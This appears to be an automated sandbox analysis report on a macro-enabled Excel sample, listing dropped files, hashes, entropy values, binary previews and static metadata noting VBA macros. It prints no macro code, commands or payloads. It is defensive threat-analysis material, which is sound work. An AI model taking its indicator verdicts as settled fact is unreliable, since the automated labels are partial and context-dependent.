                      MD5:40550DC2F9D56285FA529159B8F2C6A5
                      SHA1:DD81D41D283D2881BEC77E00D773C7E8C0744DA3
                      SHA-256:DA935E8D60E93E41BCD7C3FBB1750EF3AC471C3AF78AFC8945DFBF31EB54A1E1
                      SHA-512:FC354E4F37C9E1BA07DFC756F56A1ABE6A75230DEF908F34E43D35618B113A532E5B7C640F5B14BF75AC31003D8C66E06BA37A004E9357BF7896BD944A0514A0
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview: ....l................................... EMF........).......................`...1........................|..F...........GDIC........L0.U......................................................................................................iii.......-.....................-.....................-.....................-.....................-.........!...............'...........................-.........!.........................$.............................-...............'.................$.............................-...............'.......................................................................................!...............................!...............................'...............iii.....%...........'.......................%...........'.......................%...........'.......................%...........'.......................%...........L...d...................................!..............?...........?................................"...........!...................
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A342A0F1.png
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:PNG image data, 363 x 234, 8-bit colormap, non-interlaced
                      Category:dropped
                      Size (bytes):2653
                      Entropy (8bit):7.818766151665501
                      Encrypted:false
                      SSDEEP:48:EMJaE2jR4jEJ/ff6nMVNzNzHuuQoCpMTjOWhXP4/3dlsIfnaedCByM9x:VkjR4j6Hf6nGOWXPe/v3k/9x
                      MD5:30D3FFA1E30B519FD9B1B839CC65C7BE
                      SHA1:1EB0F0E160FF7440223A7FE46F08B503F03D3AFB
                      SHA-256:89A25BF794658FD3FABB1F042BCC283497B78E0A94098188F2DED7587B0CA3DC
                      SHA-512:88E3ABDADCBD7F308FCAED390A033F09208EAAD4053FE69DAA274CC14DD2BC815B4D63725C1EFEF3C592C1DEDE22A555DBF5303C096839F8338B2F6C9E0A3C50
                      Malicious:false
                      Reputation:low
                      Preview: .PNG........IHDR...k.........S.......tEXtSoftware.Adobe ImageReadyq.e<....PLTE.........KIK..................IDATx...b.0.E-......`.Y..~f.$.h...,..H..CLg.x<.h..k..k..k..k..k..k..k........:....$F...........E.....t.c?.~...q?.....!F....)<#$.l.......`..f.......;.......D]M.~..s.....h.}`.&{..X2.6.....s.;3>..o....0zn...])..8..;..rA..6..Xn"R..a.Bw..M....tw..mE.w....>....].._v...z...H.y..8{)Z...gu.C~.3...>]o..>_.F/....._7nt...c...n..lu..g..@......I...=.........?.9...."..Rc..b..lf.f..l.....#4...Fw.A{...&N.Z.'..2.;.?.h.|..eZf..`..`..`..`......O..m.>n.-fS.........R...q.....F..D.....w...e..x.H.?.C........;.o!.)....@G..y..EY...5.>...'.}..4(..Aj)d.Pk....7vG........,G..RZ.#F...K.<.....'j...^r.(......"......FHN.D4.j.y..wJ_...H2.....lN....?.V?...z.K.......M..F... ..t...053..:..0.~.S-.30..'...Q..et..=...5.q.Ko..Y#...H.~...C..CLi.83..6_..B.DC..>?.]..fGo..X0}C.|.@B..AJ.s.x...n..[.#WE....F.gv..i}..f}.....qG...G.O4....w6.x.L.J.......^._o:Za}..{.x.....F
                      C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\AppCrash_EXCEL.EXE_6f227b18f49da44a2d1889aa10939f535bdc_09e1e9e2\Report.wer
                      Process:C:\Windows\System32\DWWIN.EXE
                      File Type:data
                      Category:modified
                      Size (bytes):16312
                      Entropy (8bit):3.7163402135276207
                      Encrypted:false
                      SSDEEP:96:4KbBakNZESI/fQ5QXI4izw+HbngICZgpYT1uPoGl9uyEYcbkMIbFY7UGQIiTOB1A:4LBKzFCEuhTlyZVaPYVaJa5GG
                      MD5:0FDF227B92A2ECDFE906E27D6C032F8A
                      SHA1:0EB3004A2A4905A6DEAB1996B86B4328860EE777
                      SHA-256:11F89CB104E776E2E1077133CBBE0C568E3F4F870157534C1F489216E9328093
                      SHA-512:B80868BD0B49AC51AFA4A3FA0BC4B0D23656AFADE3C46EB9C72224DD787F1CF7E1215563E021F59449CA97D46FF1540FC9A1F693D77783B303935DA3FCE0E061
                      Malicious:false
                      Reputation:low
                      Preview: V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.4.8.9.2.0.8.7.0.8.2.0.8.3.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.4.8.9.2.1.0.3.9.9.2.5.1.3.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.d.7.0.3.7.a.3.-.5.4.7.d.-.1.1.e.b.-.a.d.c.f.-.e.c.f.4.b.b.b.5.9.1.5.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.d.7.0.3.7.a.2.-.5.4.7.d.-.1.1.e.b.-.a.d.c.f.-.e.c.f.4.b.b.b.5.9.1.5.b.....R.e.s.p.o.n.s.e...B.u.c.k.e.t.I.d.=.3.7.0.1.1.5.9.2.6.1.....R.e.s.p.o.n.s.e...B.u.c.k.e.t.T.a.b.l.e.=.3.8.0.7.0.7.5.2.5.....R.e.s.p.o.n.s.e...t.y.p.e.=.4.....S.i.g.[.0.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .N.a.m.e.....S.i.g.[.0.]...V.a.l.u.e.=.E.X.C.E.L...E.X.E.....S.i.g.[.1.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .V.e.r.s.i.o.n.....S.i.g.[.1.]...V.a.l.u.e.=.1.4...0...7.0.1.5...1.0.0.0.....S.i.g.[.2.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .T.i.m.e.s.t.a.m.p.....S.i.g.[.2.]...V.a.l.u.e.=.5.1.c.c.a.7.c.d.....S.i.g.[.3.]...N.a.m.
                      C:\Users\user\AppData\Local\Temp\67FE0000
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):56572
                      Entropy (8bit):7.850619347326348
                      Encrypted:false
                      SSDEEP:768:hnSWNrAli8zJjXl9e4JpKmyslLBti3rng54DpyNzSHOdFoKqbLNFq9z:hXUl/i434o9og540NzgO/ObLNFq9z
                      MD5:DEC0E4FC83D4C848B110DB20629C98DC
                      SHA1:9A7EC2860D75C9984F6713A08DA3085EF6BC91AE
                      SHA-256:FB2A27AF526DF0402AA3712EC3F0E20C9704DAC783BC737C4FF46D3629D76812
                      SHA-512:1F430E39C5AF36D0CA40E33828EF4002D4BB6C39A891027F3F489E8ED64A72914F33EE09BD56746DA162F762121113C13CA5FE2C55F7A342DD8127ED4CB098A9
                      Malicious:false
                      Reputation:low
                      Preview: ...n.0.E.......H...(,g..6@S.[......(..w(9...a....u..q...........+R..N*....o.gR....Y..."....~<z...m..>%...(.`x..........\..........&..L.l.wP.'.......l.%........^+.....+/ ..k%@:.d.F....HFS....OH.....2..]0..1....0...-..&......|_;.....W>~......x..u.n.....+.....*(.....;7..Y.....s.:.e..XB+@..3R.Ep..o5..W...#...N.Yw.Y.|U.`rBK)o.dz..g.H.{...k........t.....4.m...3d...N..?.........N.k.....DO....A..b...-.....D.....q..8..,../#..K.F.......3...r..q... ..;.6........PK..........!.........*.......[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Temp\998453.cvr
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):1392
                      Entropy (8bit):3.142934598289609
                      Encrypted:false
                      SSDEEP:24:pll/r8suFosnbeTl/3vXkJXHIUbcW1IP/dOZ5GjXO/CUnHBFzE:pll/QFZbkXWGlON/xBFY
                      MD5:91CFCC4A1A09DB77E653BB2E13F9B179
                      SHA1:165023666DAE5D631E04A9220442E401075DB3D1
                      SHA-256:BA228004FCDF193E308AB0545750EE259A1D20999071DF01CD8B4B3964256422
                      SHA-512:2FDE452FAFAB930FE87B4E633057B63D4F21FD34634D8153423467102CAB76A939694316098E5AAECFE05AAEC90632FDF5EF79E21647AF5C70162EC0693A9118
                      Malicious:false
                      Preview: MSQMx.......\.S.................g...............................X.................................................................................._......EXCE........................................5...g.......;...........<...........A...........l...........................z...S.......................S...............................................................................................B...................................a...b.......;...N...................VC..C...........F...........Q...........W.......h#...........#......................+...........+...........+...........+...+...........0...........:...........;...................Q...........................................................w...........w.... ..........:!..........n"...........".......#...".......#...".......#...".......#...".......#...".......#..7#..........?.......w...........w...............................<...B............"../....................B../.......................$...$............"..n370.....B..
                      C:\Users\user\AppData\Local\Temp\Cab955E.tmp
                      Process:C:\Windows\System32\DWWIN.EXE
                      File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                      Category:dropped
                      Size (bytes):58936
                      Entropy (8bit):7.994797855729196
                      Encrypted:true
                      SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                      MD5:E4F1E21910443409E81E5B55DC8DE774
                      SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                      SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                      SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                      Malicious:false
                      Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                      C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):241332
                      Entropy (8bit):4.206769656577553
                      Encrypted:false
                      SSDEEP:1536:cG4LEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:c5NNSk8DtKBrpb2vxrOpprf/nVq
                      MD5:C5E9F5703FA359DD72FBB85355945491
                      SHA1:21549B782C4424D9100D4477D34847842528426E
                      SHA-256:98870A08EBB24B9C458C0ECE3F7CDDF3089A26C83403BF653B00ABBF244FFA95
                      SHA-512:0AC6C3C8EF98C31CCA647277EAB1C28565ACA4F0BB02A7BFBC040594DC327D6D7BD37D601860D47823EDA5FCC11354C5C67A88EE1C2890625DA2F330DB9D7126
                      Malicious:false
                      Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................H...4............................................................................x...I..............T............ ..P........................... ...........................................................&!..............................................................................................
                      C:\Users\user\AppData\Local\Temp\Tar955F.tmp
                      Process:C:\Windows\System32\DWWIN.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):152533
                      Entropy (8bit):6.31602258454967
                      Encrypted:false
                      SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                      MD5:D0682A3C344DFC62FB18D5A539F81F61
                      SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                      SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                      SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                      Malicious:false
                      Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                      C:\Users\user\AppData\Local\Temp\WER8CF4.tmp.WERInternalMetadata.xml
                      Process:C:\Windows\System32\DWWIN.EXE
                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):3110
                      Entropy (8bit):3.6796097788243274
                      Encrypted:false
                      SSDEEP:96:Shz4tU6o7VxBt3uhhgHPe40PAn5xp38MkSMY3:Wl7LBNuhhgG45nv58MlMI
                      MD5:9951D43E6E3E0625775F9777E865C7B5
                      SHA1:6D551E14B691ED0A9383729CDD21BE086CD055AA
                      SHA-256:2E5E8A5064AA4428F1BD0F83AAB230604EBBC4FCAC184BDCDC22006D2E74B86D
                      SHA-512:8CDF8C3FE9AA9116F6621F44429268639679D8A2A5784DC0EA7AE172235742C67671188DF6786256B773A65A36E738A15FD11B11BF3F4529CAD2ED8DFD38BB7D
                      Malicious:false
                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.6...1.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.7.6.0.1. .S.e.r.v.i.c.e. .P.a.c.k. .1.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .7. .P.r.o.f.e.s.s.i.o.n.a.l.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.7.6.0.1...2.3.6.7.7...a.m.d.6.4.f.r.e...w.i.n.7.s.p.1._.l.d.r...1.7.0.2.0.9.-.0.6.0.0.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.3.0.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.a.r.e.n.t.P.r.o.c.e.s.s.I.
                      C:\Users\user\AppData\Roaming\Microsoft\Excel\~ar67E4.xar
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:data
                      Category:modified
                      Size (bytes):51613
                      Entropy (8bit):7.823714360059984
                      Encrypted:false
                      SSDEEP:768:UAK3YYc0e76UlwEBwuOASEvIrC98rbqFqcO+hxOVPZKp42A205LEdT/C9WNJVTQY:d976UmE+uhBQrC98PGZHUnN5LaLTQDi9
                      MD5:138F4E0E9934BE4DA0426CB5321F0D7F
                      SHA1:84070B3A221BFB5C0DE40209E639669583CEC8C3
                      SHA-256:1D254C6FD6801C024975A8EEF3575FE869C3AC88AF910C27E24DCA3957243217
                      SHA-512:5E69E147D8439A637A11C9B2481E0778E65DA67BF1E059FB038266990E3B0C608E2DC8BD3BFE4D187191F8D54C138663EF215073FF872A9A68255091DC7C35A9
                      Malicious:false
                      Preview: .V...0..W.? ..v....B...J=.].[.W...w.m.^..}.@......%..{o<o<...UR....<].U...FH.......i...).!O......7..... Z.<=.`?R...J..q.0.d.o.Z......j..r....n77P.G........N.O.{Q*O..Jr.0PZiAJ.A.A........I.3.....+.Y. .....,c|..0..b.Qgqe..@......\e...Ad.U....d.(..<..I\.o/0S...0..D...o.{.2..}..rR@r.\..J...6f4.x.\...x.|}F.hK...P/.B\...'...{x.VN.y.......<.@..5....e...+.*.../q.EL..:........=...q....u.D.w.H...].....L...........x.....u.,6.....T.....s.1ai.cw........1n.Hl=.C..O..&EDg......Y1t.O.8....&..a-@.h...`........PK..........!...>,....].......[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Jan 12 01:27:51 2021, atime=Tue Jan 12 01:27:51 2021, length=12288, window=hide
                      Category:dropped
                      Size (bytes):867
                      Entropy (8bit):4.48075162575188
                      Encrypted:false
                      SSDEEP:12:85Q/k2kcLgXg/XAlCPCHaXtB8XzB/DhiUBEX+WnicvbsaRbDtZ3YilMMEpxRljKA:85dDK/XTd6jhhnEYehtDv3qNArNru/
                      MD5:B339C286696BE14A0BFB8FB5E272DD38
                      SHA1:F3CC42F0CD4D791395DF1E3D43223997C63E4D41
                      SHA-256:A352E71022A6431154D763D66924E48A7411E8F285071E107CAA18D18EAACDFB
                      SHA-512:85695DE99B0CC82045A566D3BE60B0DC43FE56ECE3B080992384C3DF51220EDEEDFFEA15E51ADEBA897996E1AE444C9A8E5FE34EA9512990A2D5B0594959B1D0
                      Malicious:false
                      Preview: L..................F...........7G...]H......]H......0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....,Rz...Desktop.d......QK.X,Rz.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\813848\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......813848..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):106
                      Entropy (8bit):4.288085753919832
                      Encrypted:false
                      SSDEEP:3:oyBVomxWdxUNIVUYOhVdUNIVUYmxWdxUNIVUYv:djuSL1WLeSLC
                      MD5:3A4CD3A9401D75DF179FD5850F863649
                      SHA1:1036B9ABFAF918FB96990DA3DC6350DE5ADC5EAB
                      SHA-256:6A59F34635BEEEC2999D038D85914250458F714CB546BD29FCFA3CCA1B0E73EF
                      SHA-512:31AB0EE07F659FA4EAD5608CCF3C8E772918F24400EE013FE83838D8106BFDE4ED823B91D2C4464B108EB37F2FB15C71E9CB0EBC7AB3A2EFC469C253136D17D4
                      Malicious:false
                      Preview: Desktop.LNK=0..[misc]..sample20210111-01.LNK=0..sample20210111-01.LNK=0..[misc]..sample20210111-01.LNK=0..
                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\sample20210111-01.LNK
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Tue Jan 12 01:27:51 2021, atime=Tue Jan 12 01:27:59 2021, length=56539, window=hide
                      Category:dropped
                      Size (bytes):2108
                      Entropy (8bit):4.5041154003832595
                      Encrypted:false
                      SSDEEP:48:8Vos/XT0jFxEllGxVl1NAQh2Vos/XT0jFxEllGxVl1NAQ/:8ys/XojFxjLNAQh2ys/XojFxjLNAQ/
                      MD5:32B7E994BF13801BEBBC3697536E86AD
                      SHA1:0BF3648CA3A0DF2E5FF3FF1A57F3E20394314242
                      SHA-256:3FC1222BC12CBE95C2EFC8E5E43754912AAF46E37B1D17541FA2011FAA74F613
                      SHA-512:75F0D7763F12045792F8A68FF5DA3E40346814F53F7CCE1CD8EB11A0857C922A2156629B2BABA3FC8C57754DCB02596929248A9313E40F91497C0266E3C66AA9
                      Malicious:false
                      Preview: L..................F.... ...-....{...]H.....X....................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2.....,Rs. .SAMPLE~1.XLS..Z.......Q.y.Q.y*...8.....................s.a.m.p.l.e.2.0.2.1.0.1.1.1.-.0.1...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\813848\Users.user\Desktop\sample20210111-01.xlsm.-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.s.a.m.p.l.e.2.0.2.1.0.1.1.1.-.0.1...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......813848..........D_....3N...W..
                      C:\Users\user\Desktop\B00F0000
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):56539
                      Entropy (8bit):7.850377009214
                      Encrypted:false
                      SSDEEP:1536:hXUl/i43FH4c93BUJn5r3i7ct2ObLNFqFWf:hO/dthFIdS7BO/AWf
                      MD5:8A3A81530F27C8EA5D3597C53C57E6DE
                      SHA1:9B7503B11FD8F95656380A3DC6B3056C8F07B7AA
                      SHA-256:4FF01EF2F667E67A0D88688505BD1B86BA3C89F90E792DB92A73BC4D15809EBC
                      SHA-512:E271FA1D22EA3AD8FA29F73D51EDC852F6EEC7C9E9992D12351AB58E59BF9AE0F1F09B2DDBA5FAD6063DE1368B4BDEB30423A0543E9D94EFF01EFB122329C455
                      Malicious:false
                      Preview: ...n.0.E.......H...(,g..6@S.[......(..w(9...a....u..q...........+R..N*....o.gR....Y..."....~<z...m..>%...(.`x..........\..........&..L.l.wP.'.......l.%........^+.....+/ ..k%@:.d.F....HFS....OH.....2..]0..1....0...-..&......|_;.....W>~......x..u.n.....+.....*(.....;7..Y.....s.:.e..XB+@..3R.Ep..o5..W...#...N.Yw.Y.|U.`rBK)o.dz..g.H.{...k........t.....4.m...3d...N..?.........N.k.....DO....A..b...-.....D.....q..8..,../#..K.F.......3...r..q... ..;.6........PK..........!.........*.......[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\Desktop\~$sample20210111-01.xlsm
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):330
                      Entropy (8bit):1.4377382811115937
                      Encrypted:false
                      SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                      MD5:96114D75E30EBD26B572C1FC83D1D02E
                      SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                      SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                      SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                      Malicious:true
                      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                      Static File Info

                      General

                      File type:Microsoft Excel 2007+
                      Entropy (8bit):7.75941359400182
                      TrID:
                      • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                      • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
                      • ZIP compressed archive (8000/1) 7.58%
                      File name:sample20210111-01.xlsm
                      File size:40268
                      MD5:fa5350d4304c4c2ceafa435244b5a5fc
                      SHA1:fc8a20962b8cf86568b1e85be02ee9c7b62d94b2
                      SHA256:0104974a7bf43e2e31d25ae485f57c62efe89eaea2d3e520db8a76fa70dd956d
                      SHA512:09cf2c537c358aea59a242b2b25129cc780bcc571e0ef611e2b1eb40078c1ff27356d1a45b1dd42249685e97b18e12173be2dde0e54bf4913fcce4b3703ea625
                      SSDEEP:768:1wTZYx6TBDUzVXaI4/ybclX7aV+uFdeq9AQxD2KL0gnp5zFVqJlZ:sa6aVXaPaG7zyvxDhLnzjqJlZ
                      File Content Preview:PK..........!.o.m.....*.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                      File Icon

                      Icon Hash:e4e2aa8aa4bcbcac

                      Static OLE Info

                      General

                      Document Type:OpenXML
                      Number of OLE Files:2

                      OLE File "/opt/package/joesandbox/database/analysis/338158/sample/sample20210111-01.xlsm"

                      Indicators

                      Has Summary Info:False
                      Application Name:unknown
                      Encrypted Document:False
                      Contains Word Document Stream:
                      Contains Workbook/Book Stream:
                      Contains PowerPoint Document Stream:
                      Contains Visio Document Stream:
                      Contains ObjectPool Stream:
                      Flash Objects Count:
                      Contains VBA Macros:True

                      Summary

                      Author:
                      Last Saved By:
                      Create Time:2020-12-07T14:38:21Z
                      Last Saved Time:2021-01-11T13:42:02Z
                      Creating Application:Microsoft Excel
                      Security:0

                      Document Summary

                      Thumbnail Scaling Desired:false
                      Company:
                      Contains Dirty Links:false
                      Shared Document:false
                      Changed Hyperlinks:false
                      Application Version:16.0300

                      Streams with VBA

                      VBA File Name: Module1.bas, Stream Size: 3215
                      General
                      Stream Path:VBA/Module1
                      VBA File Name:Module1.bas
                      Stream Size:3215
                      Data ASCII:. . . . . . . . . * . . . . . . . . . . . . . . . X . . . . . . . . . . . . . . . . x . & . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Data Raw:01 16 03 00 03 f0 00 00 00 2a 05 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 58 05 00 00 f0 09 00 00 00 00 00 00 01 00 00 00 ba 78 ca 26 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                      VBA Code Keywords

                      Keyword
                      Integer:
                      bycilke()
                      VB_Name
